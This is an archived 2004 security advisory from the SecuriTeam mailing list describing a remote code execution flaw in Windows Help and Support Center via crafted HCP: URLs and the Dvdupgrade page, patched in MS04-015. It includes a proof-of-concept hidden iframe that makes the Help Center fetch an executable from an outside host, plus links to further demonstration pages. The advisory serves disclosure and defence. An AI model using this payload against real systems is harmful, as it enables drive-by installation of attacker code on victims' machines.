[NT] Windows Help Center Command Execution (Technical Details, HSC, Dvdupgrade)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/12/04

  • Next message: SecuriTeam: "[NT] Vulnerability in Help and Support Center Remote Code Execution (MS04-015)"
    To: list@securiteam.com
    Date: 12 May 2004 19:02:26 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Windows Help Center Command Execution (Technical Details, HSC, Dvdupgrade)
    ------------------------------------------------------------------------

    SUMMARY

    "Help and Support Center (HSC) is a feature in Windows that provides help
    on a variety of topics" It can also be accessed via HCP: URLs. HSC is
    installed by default on Windows XP and Windows Server 2003 systems.

    An input invalidation vulnerability in HSC exposes users to a remote code
    execution vulnerability. An attacker could use this vulnerability to run
    arbitrary code whenever the victim opens a specially formatted HCP: URL.
    The user may be automatically directed to such URL whenever he visits a
    particular web page. The issue can be also be exploited via an e-mail.

    DETAILS

    Vulnerable Systems:
     * Microsoft Windows XP and Microsoft Windows XP Service Pack 1
     * Microsoft Windows XP 64-Bit Edition Service Pack 1
     * Microsoft Windows XP 64-Bit Edition Version 2003
     * Microsoft Windows Server 2003
     * Microsoft Windows Server 2003 64-Bit Edition

    The HSC installation contains various HTML and javascript files,which are
    intended to be used by HSC's internal use. The HTML files belong in the My
    Computer Zone because they require e.g. the ability to launch external
    helper programs with JavaScript.

    By using a specialy crafted url an attacker can cause the users local
    machine to start and render helpctr.exe in the local context and passes
    the injected url to the application. The user is then presented with the
    Help and Support DvD Upgrade dialog in Help and Support Center.

    With the Dvdupgrade page, The injected url is now linked to the "upgrade
    now" button. By pressing the updrade now button, the user is presented
    with a (open) / (save) dialog box with the offending ( attackers ) file.

    This allows an attacker to initiate the Dvdupgrade action on HSC, inject
    JavaScript code which will be run in the context of these HTML files,
    speciffically "HCP://system/DVDUpgrd/dvdupgrd.htm". In this way the
    attacker can run scripts in the My Computer Zone, which can e.g. download
    an start an attacker-supplied EXE program.

    As an aside, no url activity is displayed and there is no address or
    status bar for Help and Support.

    Solution:
    Microsoft was contacted on March 18th, 2004. A patch has been produced to
    correct the vulnerability. They have issued the
    following advisory:
    <http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx>
    http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx

    Proof of Concept:
    < iframe
    src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=exploitlabs.com/msnspoof/poc/dvdupgd/dvdupgd.exe" width="1" height="1">
    </iframe>

    http://exploitlabs.com/msnspoof/poc/
    http://exploitlabs.com/msnspoof/poc/index2.html
    http://exploitlabs.com/msnspoof/poc/index3.jpg

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:security@exploitlabs.com>
    Donnie Werner of exploitlabs.

    The original article can be found at:
    <http://exploitlabs.com/files/advisories/EXPL-A-2003-027-helpctr.txt>
    http://exploitlabs.com/files/advisories/EXPL-A-2003-027-helpctr.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Vulnerability in Help and Support Center Remote Code Execution (MS04-015)"